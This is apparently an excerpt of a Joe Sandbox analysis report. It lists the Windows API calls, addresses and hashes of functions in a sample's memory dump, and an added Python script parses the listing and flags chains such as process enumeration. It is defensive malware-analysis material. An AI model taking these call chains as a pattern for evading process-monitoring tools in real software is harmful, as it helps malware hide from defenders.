• API String ID: 3340791633-0
• Opcode ID: d90ce61ea51feae1d42d489e390247e8bb5c610d1252a3bef3de58e24b3512f9
• Instruction ID: 499f4836be65eaf967dc59d46b9308b88b5bdb4c92fbd84215d5b2ccf7388e4e
• Opcode Fuzzy Hash: d90ce61ea51feae1d42d489e390247e8bb5c610d1252a3bef3de58e24b3512f9
• Instruction Fuzzy Hash: 2131CE34A55A08EFEB349E14CC16BE93767BB05BD0F584102FA51963E1C7F0A9A0DB82
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ClientToScreen.USER32(?,?), ref: 0016769A
• GetWindowRect.USER32(?,?), ref: 00167710
• PtInRect.USER32(?,?,00168B89), ref: 00167720
• MessageBeep.USER32(00000000), ref: 0016778C
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 570d4c8f3f7df1d11e4318d0898105ab1dff149ee743b3057e6e330ad3e1ffb0
• Instruction ID: 7f7a3df63dd517dc90a7209572da90521801241e2540ed6672907d770c2b2dfd
• Opcode Fuzzy Hash: 570d4c8f3f7df1d11e4318d0898105ab1dff149ee743b3057e6e330ad3e1ffb0
• Instruction Fuzzy Hash: EC419D38A05254EFDB01CF58CC98EA9B7F5FF49318F1581A9E8159B2A1D730E991CF90
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001616EB
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00133A57
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetCurrentThreadId.KERNEL32 ref: 00133A5E
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001325B3), ref: 00133A65
                                                                                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 001616FF
                                                                                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 0016174C
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00161752
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                                                                                                          • Opcode ID: 475c51528e915537863cff8e7b51c9cbb3d97c70a3bc2bfadb4b32d70f92568b
                                                                                                                                                                                                                                          • Instruction ID: 64bf92cebf3966d47ff79c2978209615eb6a76ff5ade8950efeab1b40b936b7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 475c51528e915537863cff8e7b51c9cbb3d97c70a3bc2bfadb4b32d70f92568b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C315071D00249AFD700EFA9C881CEEBBF9EF48304B5480AAE455E7312E7719E45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013DFCB
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013DFE2
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013E00D
                                                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0013E018
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3763101759-0
                                                                                                                                                                                                                                          • Opcode ID: 05febb6bfdd35da05666fb7a677a1a6606b63472833dce20e36f55fc95bf9da4
                                                                                                                                                                                                                                          • Instruction ID: 75599bbfc0534507ea393ed0a348366297e80c766e874181a7fd4e9166d96857
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05febb6bfdd35da05666fb7a677a1a6606b63472833dce20e36f55fc95bf9da4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4217175A00314AFCB109FA8D981BBEB7F8EF45750F154069F905BB286D7709E41CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0013D501
                                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0013D50F
                                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0013D52F
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0013D5DC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                                                                                          • Opcode ID: 6ce9e994359e7c72beeef3428b195e8dbfd3bd76db7c5df609b270c84ea2fb76
                                                                                                                                                                                                                                          • Instruction ID: c749876049b02efca58fc43e3520e83c541801dfc18ca6854c13accd7e567bb2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ce9e994359e7c72beeef3428b195e8dbfd3bd76db7c5df609b270c84ea2fb76
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 883181711083019FD301EF54EC81AAFBBF8EF99354F54052DF581862A2EB719949CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%
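The per-function listings above (an "APIs" block with direct calls and "Part of subcall function" lines, a "Memory Dump Source" block and a "Similarity" block) are tedious to read one at a time; the entry ending at 0013D5DC, for instance, is only recognisable as a Toolhelp32 process walk (the behaviour the report's "Tries to detect process monitoring tools" signature refers to) once you spot CreateToolhelp32Snapshot, Process32FirstW and Process32NextW together. The following is an added example, not code from the report or from Joe Sandbox: a small Python parser for this listing format that turns each entry into a record and flags API chains of interest. The sample text is constructed to mirror two entries on this page; the chain table (`CHAINS`) and the labels it assigns are the author's choice and not a Joe Sandbox classification.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and flag API chains.

Added example for this page; not part of the Joe Sandbox report or tooling.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample modelled on two entries from this page (abbreviated).
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0013D501
• Process32FirstW.KERNEL32(00000000,?), ref: 0013D50F
• Process32NextW.KERNEL32(00000000,?), ref: 0013D52F
• CloseHandle.KERNEL32(00000000), ref: 0013D5DC
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• Instruction Fuzzy Hash: 883181711083019FD301EF54EC81AAFBBF8EF99354F54052DF581862A2EB719949CBA2
Uniqueness Score: -1.00%
APIs
• GetForegroundWindow.USER32 ref: 001616EB
  • Part of subcall function 00133A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00133A57
  • Part of subcall function 00133A3D: GetCurrentThreadId.KERNEL32 ref: 00133A5E
  • Part of subcall function 00133A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001325B3), ref: 00133A65
• GetCaretPos.USER32(?), ref: 001616FF
• ClientToScreen.USER32(00000000,?), ref: 0016174C
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• Instruction Fuzzy Hash: 2C315071D00249AFD700EFA9C881CEEBBF9EF48304B5480AAE455E7312E7719E45CBA0
Uniqueness Score: -1.00%
"""

API_RE = re.compile(
    r"^[•\-*]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SOURCE_RE = re.compile(r"^[•\-*]?\s*Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^[•\-*]?\s*(?P<key>API ID|Instruction Fuzzy Hash):\s*(?P<val>\S*)")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                       # address of the call site
    subcall_of: Optional[int]      # callee address when listed as "Part of subcall function"


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    dump: str = ""
    image_base: int = 0
    api_id: str = ""
    fuzzy_hash: str = ""

    @property
    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall_of is None]

    @property
    def first_ref(self) -> int:
        # Lowest direct call-site address; a convenient key for the entry.
        return min((c.ref for c in self.direct_calls), default=0)


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing at each 'APIs' header and collect the fields of each entry."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
            continue
        m = SOURCE_RE.match(line)
        if m:
            cur.dump, cur.image_base = m["dump"], int(m["off"], 16)
            continue
        m = FIELD_RE.match(line)
        if m:
            if m["key"] == "API ID":
                cur.api_id = m["val"]
            else:
                cur.fuzzy_hash = m["val"]
    return entries


def _base(api: str) -> str:
    """Fold ANSI/Unicode variants (Process32FirstW -> Process32First) for matching."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", api)


# Chains worth a second look; labels are this example's own, not Joe Sandbox's.
CHAINS = {
    "process enumeration via Toolhelp32": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "foreground window input attach": {"GetForegroundWindow", "AttachThreadInput"},
}


def flag_chains(entry: FunctionEntry, include_subcalls: bool = True) -> List[str]:
    """Return the CHAINS labels whose APIs all appear in the entry."""
    calls = entry.calls if include_subcalls else entry.direct_calls
    seen = {_base(c.api) for c in calls}
    return [name for name, needed in CHAINS.items() if needed <= seen]


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(f"{e.first_ref:08X}  {e.api_id:<70} {flag_chains(e)}")
```

Run stand-alone it prints one line per entry with the lowest call-site address, the report's API ID and the matched chain labels. Toggling `include_subcalls` matters: the AttachThreadInput call in the second entry is reached only through subcall 00133A3D, so with `include_subcalls=False` that entry is not flagged.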

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00169001
                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00127711,?,?,?,?,?), ref: 00169016
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0016905E
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00127711,?,?,?), ref: 00169094
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2864067406-0
                                                                                                                                                                                                                                          • Opcode ID: 1607d3a388b65d9668785265e7304b39abd58f7827b4c99deb6ec940980376a5
                                                                                                                                                                                                                                          • Instruction ID: 9b8e6abccc47f280026891bf200bb1f42b8e13dda182f1778092cd8c0edc1efb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1607d3a388b65d9668785265e7304b39abd58f7827b4c99deb6ec940980376a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A219C35601018FFCF258F94CC58EFA7BBDEB8A360F144169F9059B261C37199A0DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,0016CB68), ref: 0013D2FB
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0013D30A
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0013D319
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0016CB68), ref: 0013D376
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2267087916-0
                                                                                                                                                                                                                                          • Opcode ID: a67f251765668055807be1dd066809e5ef72f12dbb59d19b1869d8ed7cb4f2de
                                                                                                                                                                                                                                          • Instruction ID: 0734cd4d64e965dd14ffc400fadd7d59ce300610ef3b49a91bf89e0d95785d33
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a67f251765668055807be1dd066809e5ef72f12dbb59d19b1869d8ed7cb4f2de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A213DB05093019FC710DF28E8819AA7BE4FF56764F504A1EF499C72A2DB319D49CB93
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00131014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0013102A
                                                                                                                                                                                                                                            • Part of subcall function 00131014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00131036
                                                                                                                                                                                                                                            • Part of subcall function 00131014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00131045
                                                                                                                                                                                                                                            • Part of subcall function 00131014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0013104C
                                                                                                                                                                                                                                            • Part of subcall function 00131014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00131062
                                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001315BE
                                                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 001315E1
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00131617
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0013161E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1592001646-0
                                                                                                                                                                                                                                          • Opcode ID: 0bc034fed977c59a36c755c2272c28f7fd2c0292727767d784ceb64adc5e7238
                                                                                                                                                                                                                                          • Instruction ID: bb14150afaeb06f5c36d0c40f32e0b5c0fd3c567dcb490fae8e028bfd420dee4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc034fed977c59a36c755c2272c28f7fd2c0292727767d784ceb64adc5e7238
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3218971E00109FFDF00DFA5C945BEEB7B8EF45344F088469E445AB241E7B0AA45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0016280A
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00162824
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00162832
                                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00162840
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                                                                                                          • Opcode ID: 7dc473bc99789c9d14bab8c37ea6dd0620efcb765a8b28541d7f088816035b54
                                                                                                                                                                                                                                          • Instruction ID: 3cc1ed8995cc63da52e9d385b1bb18634d27a0485afca40c3f00aed07b398c09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dc473bc99789c9d14bab8c37ea6dd0620efcb765a8b28541d7f088816035b54
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3821F131305911AFD7149B24CC44FAA7B99AF55324F148159F4268B6E2C7B1FC82C7D0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0014CE89
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0014CEEA
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 0014CEFE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 234945975-0
                                                                                                                                                                                                                                          • Opcode ID: 3fc7c2f407cd6f75202cf54642fd646f0ae45f675257da1036b5b0af3a8066e0
                                                                                                                                                                                                                                          • Instruction ID: 987bc96a36d233c257f850ba23cbcad1de3eeefaa3f550b385a01a9427efa0f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fc7c2f407cd6f75202cf54642fd646f0ae45f675257da1036b5b0af3a8066e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F21CFB15013059BDB60DFA5C948BA77BFCEB40354F10442EE646E2561E774EE489BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
• Part of subcall function 00138D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0013790A,?,000000FF,?,00138754,00000000,?,0000001C,?,?), ref: 00138D8C
• Part of subcall function 00138D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00138DB2
• Part of subcall function 00138D7D: lstrcmpiW.KERNEL32(00000000,?,0013790A,?,000000FF,?,00138754,00000000,?,0000001C,?,?), ref: 00138DE3
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00138754,00000000,?,0000001C,?,?,00000000), ref: 00137923
• lstrcpyW.KERNEL32(00000000,?), ref: 00137949
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00138754,00000000,?,0000001C,?,?,00000000), ref: 00137984
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 78e6be2c7a1bc74d2fe0223ba425e4bdfab79c2dd41d43e740b2704b3b07896c
• Instruction ID: 81a5a7939dfcb096fced0bef41dba057b8b0356cdd3af51c22e1670825665103
• Opcode Fuzzy Hash: 78e6be2c7a1bc74d2fe0223ba425e4bdfab79c2dd41d43e740b2704b3b07896c
• Instruction Fuzzy Hash: 2B11037A200342AFDB25AF35CC44E7A77A9FF85364F00812AF842C73A4EB719801C7A1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000F0), ref: 00167D0B
• SetWindowLongW.USER32(00000000,000000F0,?), ref: 00167D2A
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00167D42
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0014B7AD,00000000), ref: 00167D6B
